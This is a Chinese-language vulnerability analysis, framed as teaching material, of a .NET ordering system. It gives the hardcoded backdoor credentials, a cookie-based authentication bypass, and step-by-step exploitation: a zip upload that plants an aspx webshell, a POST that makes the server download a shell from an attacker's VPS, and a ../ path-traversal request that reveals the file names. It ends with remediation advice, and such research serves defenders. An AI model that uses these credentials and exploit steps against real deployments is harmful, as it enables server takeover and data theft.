某订货系统文件上传漏洞分析教学文档<\/h1>

0x01 系统鉴权机制分析<\/h2>

双重鉴权机制<\/h3>

第一层鉴权<\/strong>：使用.NET的FormsAuthenticationModule<\/code> HTTP模块<\/p>

主要功能：管理用户身份验证过程（登录、票据管理、重定向等）<\/li> 关键方法OnEnter<\/code>逻辑：检查当前请求是否访问登录页面(AuthenticationConfig.AccessingLoginPage<\/code>)<\/li> 非登录页面请求调用SetSkipAuthorizationNoDemand<\/code>方法<\/li> 根据请求是否为有效Web资源决定是否跳过授权检查<\/li> <\/ul> <\/li> <\/ul> <\/li> 第二层鉴权<\/strong>：自定义AdminPage<\/code>类实现<\/p> 关键方法OnInit<\/code>（页面初始化时调用）<\/li> CheckPageAccess<\/code>检查流程：检查用户是否为站点管理员<\/li> 检查用户是否为管理员<\/li> 检查用户是否具有页面所需特定权限<\/li> 不符合条件则重定向到相应页面<\/li> <\/ol> <\/li> <\/ul> <\/li> <\/ol> 后门账户发现<\/h3> 存在硬编码后门账户：SuperMember<\/code>\/MdYdt2017Admin<\/code><\/li> 登录后直接使用userid=1101<\/code>（管理员账户）<\/li> <\/ul> 用户对象获取方式<\/h3> HiContext.Current.User<\/code> → 内部调用Users.GetUser<\/code><\/li> Users.GetUser<\/code>方法重载： GetUser()<\/code>：通过GetLoggedOnUsername()<\/code>获取用户名<\/li> GetUser(int userId)<\/code><\/li> GetUser(int userId, bool isCacheable)<\/code><\/li> GetUser(int userId, string username, bool isCacheable, bool userIsOnline)<\/code><\/li> <\/ul> <\/li> <\/ol> 关键绕过点<\/strong>：<\/p> GetLoggedOnUsername()<\/code>直接从cookie中取Vshop-Member<\/code>参数作为用户名<\/li> 若流程不验证密码，控制userId<\/code>或username<\/code>可绕过鉴权<\/li> <\/ul> 0x02 文件上传漏洞分析<\/h2> 漏洞位置<\/h3> 类：ManageThemes<\/code>（继承自AdminPage<\/code>）<\/li> 文件：\/admin\/ManageThemes.aspx<\/code><\/li> 关键方法：btnUpload2_Click<\/code> → PrepareDataFiles<\/code><\/li> <\/ul> 漏洞利用条件<\/h3> 管理员权限（需使用后门账户登录）<\/li> 上传包含以下内容的zip文件：恶意文件（如webshell）<\/li> 与模板同名的xml文件（避免Page_Load<\/code>报错）<\/li> <\/ul> <\/li> <\/ol> 漏洞利用步骤<\/h3> 登录系统（使用后门账户）<\/li> 访问隐藏的上传功能（修改CSS display:none<\/code>）<\/li> 构造恶意zip包：包含webshell文件（如1.aspx）<\/li> 包含与模板同名的xml文件（如test.xml）<\/li> <\/ul> <\/li> 上传时修改请求参数：设置hdtempname=test<\/code>（与xml文件名一致）<\/li> 确保ContentType正确<\/li> <\/ul> <\/li> <\/ol> 访问路径<\/h3> 上传成功后webshell位于： \/Templates\/master\/pc\/[模板名]\/[恶意文件名]<\/code> 示例：\/Templates\/master\/pc\/test\/1.aspx<\/code><\/p> 0x03 远程文件下载漏洞分析<\/h2> 漏洞位置<\/h3> 处理程序：TaobaoProductHandler<\/code>（API<\/code>目录下）<\/li> 文件：对应.ashx<\/code>文件<\/li> 关键方法：ProcessRequest<\/code> → ProcessTaobaoProductDown<\/code><\/li> <\/ul> 漏洞特点<\/h3> 无需鉴权（未继承AdminPage<\/code>）<\/li> 使用WebClient.DownloadFile<\/code>下载远程文件 URL参数：通过ImageUrls<\/code>表单参数控制<\/li> 保存路径：\/Storage\/master\/product\/images\/<\/code><\/li> 文件名：32位随机字符串（Guid.NewGuid()<\/code>生成）<\/li> <\/ul> <\/li> <\/ol> 漏洞利用步骤<\/h3> 在VPS上托管恶意文件<\/li> 构造请求下载文件： POST \/API\/TaobaoProductHandler.ashx ImageUrls=http:\/\/your-vps\/shell.aspx <\/code><\/pre> <\/li> 文件将下载到服务器随机命名<\/li> <\/ol> 文件名获取方法<\/h3> 使用FillTableForPath<\/code>方法遍历目录：<\/p> 通过cookie设置Vshop-Member=admin<\/code>绕过鉴权<\/li> 利用路径穿越获取文件列表： GET \/path?cid=..\/..\/Storage\/master\/product\/images\/ <\/code><\/pre> <\/li> 响应中包含file_list<\/code>信息，可获取随机文件名<\/li> <\/ol> 防御建议<\/h2> 移除后门账户<\/li> 加强文件上传验证：检查文件内容而不仅是扩展名<\/li> 限制解压操作的安全目录<\/li> <\/ul> <\/li> 修复远程下载漏洞：添加鉴权检查<\/li> 限制下载URL为可信域名<\/li> 禁用路径穿越功能<\/li> <\/ul> <\/li> 加强用户认证：避免依赖cookie中的用户名<\/li> 实现完整的会话验证机制<\/li> <\/ul> <\/li> 隐藏敏感功能：彻底移除而非仅CSS隐藏后台功能<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 该订货系统存在多重安全漏洞，包括：<\/p> 硬编码后门账户<\/li> 鉴权绕过风险<\/li> 不安全的文件上传功能<\/li> 未授权远程文件下载<\/li> 目录遍历信息泄露<\/li> <\/ol> 利用链可组合实现从普通用户到完全控制服务器的攻击路径，需全面修复。<\/p>